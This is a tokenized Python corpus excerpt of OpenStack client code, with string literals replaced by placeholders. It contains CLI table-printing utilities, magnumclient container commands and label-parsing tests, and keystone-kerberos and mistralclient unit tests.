unauthenticated = True <EOL> return func <EOL> def isunauthenticated ( func ) : <EOL> """<STR_LIT>""" <EOL> return getattr ( func , '<STR_LIT>' , False ) <EOL> def print_list ( objs , fields , formatters = None , sortby_index = <NUM_LIT:0> , <EOL> mixed_case_fields = None , field_labels = None , json_flag = False ) : <EOL> """<STR_LIT>""" <EOL> if json_flag : <EOL> print ( json . dumps ( [ o . _info for o in objs ] , indent = <NUM_LIT:4> , <EOL> separators = ( '<STR_LIT:U+002C>' , '<STR_LIT>' ) ) ) <EOL> return <EOL> formatters = formatters or { } <EOL> mixed_case_fields = mixed_case_fields or [ ] <EOL> field_labels = field_labels or fields <EOL> if len ( field_labels ) != len ( fields ) : <EOL> raise ValueError ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : field_labels , '<STR_LIT>' : fields } ) <EOL> if sortby_index is None : <EOL> kwargs = { } <EOL> else : <EOL> kwargs = { '<STR_LIT>' : field_labels [ sortby_index ] } <EOL> pt = prettytable . PrettyTable ( field_labels ) <EOL> pt . align = '<STR_LIT:l>' <EOL> for o in objs : <EOL> row = [ ] <EOL> for field in fields : <EOL> if field in formatters : <EOL> row . append ( formatters [ field ] ( o ) ) <EOL> else : <EOL> if field in mixed_case_fields : <EOL> field_name = field . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) <EOL> else : <EOL> field_name = field . lower ( ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) <EOL> if isinstance ( o , dict ) : <EOL> data = o . get ( field_name , '<STR_LIT>' ) <EOL> else : <EOL> data = getattr ( o , field_name , '<STR_LIT>' ) <EOL> row . append ( data ) <EOL> pt . add_row ( row ) <EOL> if six . PY3 : <EOL> print ( encodeutils . safe_encode ( pt . get_string ( ** kwargs ) ) . decode ( ) ) <EOL> else : <EOL> print ( encodeutils . safe_encode ( pt . 
get_string ( ** kwargs ) ) ) <EOL> def print_dict ( dct , dict_property = "<STR_LIT>" , wrap = <NUM_LIT:0> , dict_value = '<STR_LIT>' , <EOL> json_flag = False ) : <EOL> """<STR_LIT>""" <EOL> if json_flag : <EOL> print ( json . dumps ( dct , indent = <NUM_LIT:4> , separators = ( '<STR_LIT:U+002C>' , '<STR_LIT>' ) ) ) <EOL> return <EOL> pt = prettytable . PrettyTable ( [ dict_property , dict_value ] ) <EOL> pt . align = '<STR_LIT:l>' <EOL> for k , v in sorted ( dct . items ( ) ) : <EOL> if isinstance ( v , dict ) : <EOL> v = six . text_type ( v ) <EOL> if wrap > <NUM_LIT:0> : <EOL> v = textwrap . fill ( six . text_type ( v ) , wrap ) <EOL> if v and isinstance ( v , six . string_types ) and r'<STR_LIT:\n>' in v : <EOL> lines = v . strip ( ) . split ( r'<STR_LIT:\n>' ) <EOL> col1 = k <EOL> for line in lines : <EOL> pt . add_row ( [ col1 , line ] ) <EOL> col1 = '<STR_LIT>' <EOL> else : <EOL> pt . add_row ( [ k , v ] ) <EOL> if six . PY3 : <EOL> print ( encodeutils . safe_encode ( pt . get_string ( ) ) . decode ( ) ) <EOL> else : <EOL> print ( encodeutils . safe_encode ( pt . get_string ( ) ) ) <EOL> def get_password ( max_password_prompts = <NUM_LIT:3> ) : <EOL> """<STR_LIT>""" <EOL> verify = strutils . bool_from_string ( env ( "<STR_LIT>" ) ) <EOL> pw = None <EOL> if hasattr ( sys . stdin , "<STR_LIT>" ) and sys . stdin . isatty ( ) : <EOL> try : <EOL> for __ in moves . range ( max_password_prompts ) : <EOL> pw1 = getpass . getpass ( "<STR_LIT>" ) <EOL> if verify : <EOL> pw2 = getpass . getpass ( "<STR_LIT>" ) <EOL> else : <EOL> pw2 = pw1 <EOL> if pw1 == pw2 and pw1 : <EOL> pw = pw1 <EOL> break <EOL> except EOFError : <EOL> pass <EOL> return pw <EOL> def service_type ( stype ) : <EOL> """<STR_LIT>""" <EOL> def inner ( f ) : <EOL> f . service_type = stype <EOL> return f <EOL> return inner <EOL> def get_service_type ( f ) : <EOL> """<STR_LIT>""" <EOL> return getattr ( f , '<STR_LIT>' , None ) <EOL> def pretty_choice_list ( l ) : <EOL> return '<STR_LIT:U+002CU+0020>' . 
join ( "<STR_LIT>" % i for i in l ) <EOL> def exit ( msg = '<STR_LIT>' ) : <EOL> if msg : <EOL> print ( msg , file = sys . stderr ) <EOL> sys . exit ( <NUM_LIT:1> ) </s>
<s> from ironicclient . tests . unit import utils <EOL> module_str = '<STR_LIT>' <EOL> class ImportTest ( utils . BaseTestCase ) : <EOL> def check_exported_symbols ( self , exported_symbols ) : <EOL> self . assertIn ( '<STR_LIT>' , exported_symbols ) <EOL> self . assertIn ( '<STR_LIT>' , exported_symbols ) <EOL> self . assertIn ( '<STR_LIT>' , exported_symbols ) <EOL> def test_import_objects ( self ) : <EOL> module = __import__ ( module_str ) <EOL> exported_symbols = dir ( module ) <EOL> self . check_exported_symbols ( exported_symbols ) <EOL> def test_default_import ( self ) : <EOL> default_imports = __import__ ( module_str , globals ( ) , locals ( ) , [ '<STR_LIT:*>' ] ) <EOL> exported_symbols = dir ( default_imports ) <EOL> self . check_exported_symbols ( exported_symbols ) <EOL> def test_import__all__ ( self ) : <EOL> module = __import__ ( module_str ) <EOL> self . check_exported_symbols ( module . __all__ ) </s>
<s> import uuid <EOL> from keystoneauth1 import fixture as ks_fixture <EOL> from keystoneauth1 import session <EOL> from keystoneclient_kerberos . tests import base <EOL> from keystoneclient_kerberos import v3 <EOL> class TestFederatedAuth ( base . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestFederatedAuth , self ) . setUp ( ) <EOL> self . protocol = uuid . uuid4 ( ) . hex <EOL> self . identity_provider = uuid . uuid4 ( ) . hex <EOL> @ property <EOL> def token_url ( self ) : <EOL> return "<STR_LIT>" % ( <EOL> self . TEST_V3_URL , <EOL> self . identity_provider , <EOL> self . protocol ) <EOL> def test_unscoped_federated_auth ( self ) : <EOL> token_id , _ = self . kerberos_mock . mock_auth_success ( url = self . token_url , <EOL> method = '<STR_LIT:GET>' ) <EOL> plugin = v3 . FederatedKerberos ( auth_url = self . TEST_V3_URL , <EOL> protocol = self . protocol , <EOL> identity_provider = self . identity_provider ) <EOL> sess = session . Session ( ) <EOL> tok = plugin . get_token ( sess ) <EOL> self . assertEqual ( token_id , tok ) <EOL> def test_project_scoped_federated_auth ( self ) : <EOL> self . kerberos_mock . mock_auth_success ( url = self . token_url , method = '<STR_LIT:GET>' ) <EOL> scoped_id = uuid . uuid4 ( ) . hex <EOL> scoped_body = ks_fixture . V3Token ( ) <EOL> scoped_body . set_project_scope ( ) <EOL> self . requests_mock . post ( '<STR_LIT>' % self . TEST_V3_URL , <EOL> json = scoped_body , <EOL> headers = { '<STR_LIT>' : scoped_id , <EOL> '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' } ) <EOL> plugin = v3 . FederatedKerberos ( auth_url = self . TEST_V3_URL , <EOL> protocol = self . protocol , <EOL> identity_provider = self . identity_provider , <EOL> project_id = scoped_body . project_id ) <EOL> sess = session . Session ( ) <EOL> tok = plugin . get_token ( sess ) <EOL> proj = plugin . get_project_id ( sess ) <EOL> self . assertEqual ( scoped_id , tok ) <EOL> self . assertEqual ( scoped_body . project_id , proj ) </s>
<s> import collections <EOL> import six <EOL> from magnumclient . common import cliutils <EOL> from magnumclient . common import utils <EOL> from magnumclient import exceptions as exc <EOL> from magnumclient . tests import utils as test_utils <EOL> class CommonFiltersTest ( test_utils . BaseTestCase ) : <EOL> def test_limit ( self ) : <EOL> result = utils . common_filters ( limit = <NUM_LIT> ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , result ) <EOL> def test_limit_0 ( self ) : <EOL> result = utils . common_filters ( limit = <NUM_LIT:0> ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , result ) <EOL> def test_limit_negative_number ( self ) : <EOL> result = utils . common_filters ( limit = - <NUM_LIT:2> ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , result ) <EOL> def test_other ( self ) : <EOL> for key in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> result = utils . common_filters ( ** { key : '<STR_LIT:test>' } ) <EOL> self . assertEqual ( [ '<STR_LIT>' % key ] , result ) <EOL> class SplitAndDeserializeTest ( test_utils . BaseTestCase ) : <EOL> def test_split_and_deserialize ( self ) : <EOL> ret = utils . split_and_deserialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( ( '<STR_LIT:str>' , '<STR_LIT:foo>' ) , ret ) <EOL> ret = utils . split_and_deserialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( ( '<STR_LIT:int>' , <NUM_LIT:1> ) , ret ) <EOL> ret = utils . split_and_deserialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( ( '<STR_LIT:bool>' , False ) , ret ) <EOL> ret = utils . split_and_deserialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( ( '<STR_LIT:list>' , [ <NUM_LIT:1> , "<STR_LIT:foo>" , <NUM_LIT:2> ] ) , ret ) <EOL> ret = utils . split_and_deserialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( ( '<STR_LIT>' , { "<STR_LIT:foo>" : <NUM_LIT:1> } ) , ret ) <EOL> ret = utils . split_and_deserialize ( '<STR_LIT>' ) <EOL> self . assertEqual ( ( '<STR_LIT>' , "<STR_LIT:1>" ) , ret ) <EOL> def test_split_and_deserialize_fail ( self ) : <EOL> self . 
assertRaises ( exc . CommandError , <EOL> utils . split_and_deserialize , '<STR_LIT>' ) <EOL> class ArgsArrayToPatchTest ( test_utils . BaseTestCase ) : <EOL> def test_args_array_to_patch ( self ) : <EOL> my_args = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> patch = utils . args_array_to_patch ( my_args [ '<STR_LIT>' ] , <EOL> my_args [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:value>' : '<STR_LIT:foo>' , '<STR_LIT:path>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:value>' : <NUM_LIT:1> , '<STR_LIT:path>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:value>' : True , '<STR_LIT:path>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:value>' : [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , '<STR_LIT:path>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:value>' : { "<STR_LIT:foo>" : "<STR_LIT:bar>" } , <EOL> '<STR_LIT:path>' : '<STR_LIT>' } ] , patch ) <EOL> def test_args_array_to_patch_format_error ( self ) : <EOL> my_args = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . assertRaises ( exc . CommandError , utils . args_array_to_patch , <EOL> my_args [ '<STR_LIT>' ] , my_args [ '<STR_LIT>' ] ) <EOL> def test_args_array_to_patch_remove ( self ) : <EOL> my_args = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> patch = utils . args_array_to_patch ( my_args [ '<STR_LIT>' ] , <EOL> my_args [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( [ { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:path>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:path>' : '<STR_LIT>' } ] , patch ) <EOL> class FormatLabelsTest ( test_utils . BaseTestCase ) : <EOL> def test_format_label_none ( self ) : <EOL> self . assertEqual ( { } , utils . 
format_labels ( None ) ) <EOL> def test_format_labels ( self ) : <EOL> l = utils . format_labels ( [ <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , l ) <EOL> def test_format_labels_semicolon ( self ) : <EOL> l = utils . format_labels ( [ <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , l ) <EOL> def test_format_labels_mix_commas_semicolon ( self ) : <EOL> l = utils . format_labels ( [ <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , l ) <EOL> def test_format_labels_split ( self ) : <EOL> l = utils . format_labels ( [ <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , l ) <EOL> def test_format_labels_multiple ( self ) : <EOL> l = utils . format_labels ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , l ) <EOL> def test_format_labels_multiple_colon_values ( self ) : <EOL> l = utils . format_labels ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> self . 
assertEqual ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } , l ) <EOL> def test_format_labels_parse_comma_false ( self ) : <EOL> l = utils . format_labels ( <EOL> [ '<STR_LIT>' ] , <EOL> parse_comma = False ) <EOL> self . assertEqual ( { '<STR_LIT>' : '<STR_LIT>' } , l ) <EOL> def test_format_labels_multiple_values_per_labels ( self ) : <EOL> l = utils . format_labels ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> self . assertIn ( '<STR_LIT>' , l ) <EOL> self . assertIn ( '<STR_LIT>' , l [ '<STR_LIT>' ] ) <EOL> self . assertIn ( '<STR_LIT>' , l [ '<STR_LIT>' ] ) <EOL> def test_format_label_bad_label ( self ) : <EOL> labels = [ '<STR_LIT>' ] <EOL> ex = self . assertRaises ( exc . CommandError , <EOL> utils . format_labels , labels ) <EOL> self . assertEqual ( '<STR_LIT>' <EOL> '<STR_LIT>' , str ( ex ) ) <EOL> def test_format_multiple_bad_label ( self ) : <EOL> labels = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> ex = self . assertRaises ( exc . CommandError , <EOL> utils . format_labels , labels ) <EOL> self . assertEqual ( '<STR_LIT>' <EOL> '<STR_LIT>' , str ( ex ) ) <EOL> class CliUtilsTest ( test_utils . BaseTestCase ) : <EOL> def test_keys_and_vals_to_strs ( self ) : <EOL> dict_in = { six . u ( '<STR_LIT:a>' ) : six . u ( '<STR_LIT:1>' ) , <EOL> six . u ( '<STR_LIT:b>' ) : { six . u ( '<STR_LIT:x>' ) : <NUM_LIT:1> , <EOL> '<STR_LIT:y>' : six . u ( '<STR_LIT:2>' ) , <EOL> six . u ( '<STR_LIT:z>' ) : six . u ( '<STR_LIT:3>' ) } , <EOL> '<STR_LIT:c>' : <NUM_LIT:7> } <EOL> dict_exp = collections . OrderedDict ( [ <EOL> ( '<STR_LIT:a>' , '<STR_LIT:1>' ) , <EOL> ( '<STR_LIT:b>' , collections . OrderedDict ( [ <EOL> ( '<STR_LIT:x>' , <NUM_LIT:1> ) , <EOL> ( '<STR_LIT:y>' , '<STR_LIT:2>' ) , <EOL> ( '<STR_LIT:z>' , '<STR_LIT:3>' ) ] ) ) , <EOL> ( '<STR_LIT:c>' , <NUM_LIT:7> ) ] ) <EOL> dict_out = cliutils . keys_and_vals_to_strs ( dict_in ) <EOL> dict_act = collections . 
OrderedDict ( [ <EOL> ( '<STR_LIT:a>' , dict_out [ '<STR_LIT:a>' ] ) , <EOL> ( '<STR_LIT:b>' , collections . OrderedDict ( sorted ( dict_out [ '<STR_LIT:b>' ] . items ( ) ) ) ) , <EOL> ( '<STR_LIT:c>' , dict_out [ '<STR_LIT:c>' ] ) ] ) <EOL> self . assertEqual ( six . text_type ( dict_exp ) , six . text_type ( dict_act ) ) </s>
<s> import json <EOL> from magnumclient . common import cliutils as utils <EOL> from magnumclient . common import utils as magnum_utils <EOL> from magnumclient import exceptions <EOL> def _show_container ( container ) : <EOL> utils . print_dict ( container . _info ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> required = True , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> required = True , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def do_container_create ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> bay = cs . bays . get ( args . bay ) <EOL> if bay . status not in [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise exceptions . InvalidAttribute ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( bay . uuid , bay . status , "<STR_LIT>" ) ) <EOL> return <EOL> opts = { } <EOL> opts [ '<STR_LIT:name>' ] = args . name <EOL> opts [ '<STR_LIT:image>' ] = args . image <EOL> opts [ '<STR_LIT>' ] = bay . uuid <EOL> opts [ '<STR_LIT>' ] = args . command <EOL> opts [ '<STR_LIT>' ] = args . memory <EOL> _show_container ( cs . containers . create ( ** opts ) ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> default = None , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> type = int , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> choices = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . 
arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> def do_container_list ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> opts = { } <EOL> opts [ '<STR_LIT>' ] = args . bay <EOL> opts [ '<STR_LIT>' ] = args . marker <EOL> opts [ '<STR_LIT>' ] = args . limit <EOL> opts [ '<STR_LIT>' ] = args . sort_key <EOL> opts [ '<STR_LIT>' ] = args . sort_dir <EOL> containers = cs . containers . list ( ** opts ) <EOL> columns = ( '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT:status>' , '<STR_LIT>' ) <EOL> utils . print_list ( containers , columns , <EOL> { '<STR_LIT>' : magnum_utils . print_list_field ( '<STR_LIT>' ) } , <EOL> sortby_index = None ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_delete ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> for container in args . containers : <EOL> try : <EOL> cs . containers . delete ( container ) <EOL> print ( "<STR_LIT>" % <EOL> container ) <EOL> except Exception as e : <EOL> print ( "<STR_LIT>" % <EOL> { '<STR_LIT>' : container , '<STR_LIT:e>' : e } ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_show ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> container = cs . containers . get ( args . container ) <EOL> if args . json : <EOL> print ( json . dumps ( container . _info ) ) <EOL> else : <EOL> _show_container ( container ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_reboot ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> for container in args . containers : <EOL> try : <EOL> cs . containers . 
reboot ( container ) <EOL> except Exception as e : <EOL> print ( "<STR_LIT>" % <EOL> { '<STR_LIT>' : container , '<STR_LIT:e>' : e } ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_stop ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> for container in args . containers : <EOL> try : <EOL> cs . containers . stop ( container ) <EOL> except Exception as e : <EOL> print ( "<STR_LIT>" % <EOL> { '<STR_LIT>' : container , '<STR_LIT:e>' : e } ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_start ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> for container in args . containers : <EOL> try : <EOL> cs . containers . start ( container ) <EOL> except Exception as e : <EOL> print ( "<STR_LIT>" % <EOL> { '<STR_LIT>' : container , '<STR_LIT:e>' : e } ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_pause ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> for container in args . containers : <EOL> try : <EOL> cs . containers . pause ( container ) <EOL> except Exception as e : <EOL> print ( "<STR_LIT>" % <EOL> { '<STR_LIT>' : container , '<STR_LIT:e>' : e } ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> nargs = '<STR_LIT:+>' , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_unpause ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> for container in args . containers : <EOL> try : <EOL> cs . containers . unpause ( container ) <EOL> except Exception as e : <EOL> print ( "<STR_LIT>" % <EOL> { '<STR_LIT>' : container , '<STR_LIT:e>' : e } ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_logs ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> logs = cs . containers . logs ( args . 
container ) <EOL> print ( logs ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> @ utils . arg ( '<STR_LIT>' , <EOL> required = True , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> def do_container_exec ( cs , args ) : <EOL> """<STR_LIT>""" <EOL> output = cs . containers . execute ( args . container , args . command ) <EOL> print ( output ) </s>
<s> import abc <EOL> import textwrap <EOL> from cliff import lister <EOL> import six <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class MistralLister ( lister . Lister ) : <EOL> @ abc . abstractmethod <EOL> def _get_format_function ( self ) : <EOL> raise NotImplementedError <EOL> @ abc . abstractmethod <EOL> def _get_resources ( self , parsed_args ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def _validate_parsed_args ( self , parsed_args ) : <EOL> pass <EOL> def take_action ( self , parsed_args ) : <EOL> self . _validate_parsed_args ( parsed_args ) <EOL> f = self . _get_format_function ( ) <EOL> ret = self . _get_resources ( parsed_args ) <EOL> if not isinstance ( ret , list ) : <EOL> ret = [ ret ] <EOL> data = [ f ( r ) [ <NUM_LIT:1> ] for r in ret ] <EOL> if data : <EOL> return f ( ) [ <NUM_LIT:0> ] , data <EOL> else : <EOL> return f ( ) <EOL> def cut ( string , length = <NUM_LIT> ) : <EOL> if string and len ( string ) > length : <EOL> return "<STR_LIT>" % string [ : length ] <EOL> else : <EOL> return string <EOL> def wrap ( string , width = <NUM_LIT> ) : <EOL> if string and len ( string ) > width : <EOL> return textwrap . fill ( string , width ) <EOL> else : <EOL> return string </s>
<s> import os <EOL> import tempfile <EOL> import uuid <EOL> import mock <EOL> import testtools <EOL> from mistralclient . api import client <EOL> AUTH_HTTP_URL = '<STR_LIT>' <EOL> AUTH_HTTPS_URL = AUTH_HTTP_URL . replace ( '<STR_LIT:http>' , '<STR_LIT>' ) <EOL> MISTRAL_HTTP_URL = '<STR_LIT>' <EOL> MISTRAL_HTTPS_URL = MISTRAL_HTTP_URL . replace ( '<STR_LIT:http>' , '<STR_LIT>' ) <EOL> class BaseClientTests ( testtools . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_mistral_url_default ( self , mock , keystone_client_mock ) : <EOL> keystone_client_instance = keystone_client_mock . return_value <EOL> keystone_client_instance . auth_token = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . project_id = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . user_id = str ( uuid . uuid4 ( ) ) <EOL> expected_args = ( <EOL> MISTRAL_HTTP_URL , <EOL> keystone_client_instance . auth_token , <EOL> keystone_client_instance . project_id , <EOL> keystone_client_instance . user_id <EOL> ) <EOL> expected_kwargs = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False <EOL> } <EOL> client . client ( <EOL> username = '<STR_LIT>' , <EOL> project_name = '<STR_LIT>' , <EOL> auth_url = AUTH_HTTP_URL <EOL> ) <EOL> self . assertTrue ( mock . called ) <EOL> self . assertEqual ( mock . call_args [ <NUM_LIT:0> ] , expected_args ) <EOL> self . assertDictEqual ( mock . call_args [ <NUM_LIT:1> ] , expected_kwargs ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_mistral_url_https_insecure ( self , mock , keystone_client_mock ) : <EOL> keystone_client_instance = keystone_client_mock . return_value <EOL> keystone_client_instance . auth_token = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . project_id = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . user_id = str ( uuid . uuid4 ( ) ) <EOL> expected_args = ( <EOL> MISTRAL_HTTPS_URL , <EOL> keystone_client_instance . 
auth_token , <EOL> keystone_client_instance . project_id , <EOL> keystone_client_instance . user_id <EOL> ) <EOL> expected_kwargs = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : True <EOL> } <EOL> client . client ( <EOL> mistral_url = MISTRAL_HTTPS_URL , <EOL> username = '<STR_LIT>' , <EOL> project_name = '<STR_LIT>' , <EOL> auth_url = AUTH_HTTP_URL , <EOL> cacert = None , <EOL> insecure = True <EOL> ) <EOL> self . assertTrue ( mock . called ) <EOL> self . assertEqual ( mock . call_args [ <NUM_LIT:0> ] , expected_args ) <EOL> self . assertDictEqual ( mock . call_args [ <NUM_LIT:1> ] , expected_kwargs ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_mistral_url_https_secure ( self , mock , keystone_client_mock ) : <EOL> fd , path = tempfile . mkstemp ( suffix = '<STR_LIT>' ) <EOL> keystone_client_instance = keystone_client_mock . return_value <EOL> keystone_client_instance . auth_token = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . project_id = str ( uuid . uuid4 ( ) ) <EOL> keystone_client_instance . user_id = str ( uuid . uuid4 ( ) ) <EOL> expected_args = ( <EOL> MISTRAL_HTTPS_URL , <EOL> keystone_client_instance . auth_token , <EOL> keystone_client_instance . project_id , <EOL> keystone_client_instance . user_id <EOL> ) <EOL> expected_kwargs = { <EOL> '<STR_LIT>' : path , <EOL> '<STR_LIT>' : False <EOL> } <EOL> try : <EOL> client . client ( <EOL> mistral_url = MISTRAL_HTTPS_URL , <EOL> username = '<STR_LIT>' , <EOL> project_name = '<STR_LIT>' , <EOL> auth_url = AUTH_HTTP_URL , <EOL> cacert = path , <EOL> insecure = False <EOL> ) <EOL> finally : <EOL> os . close ( fd ) <EOL> os . unlink ( path ) <EOL> self . assertTrue ( mock . called ) 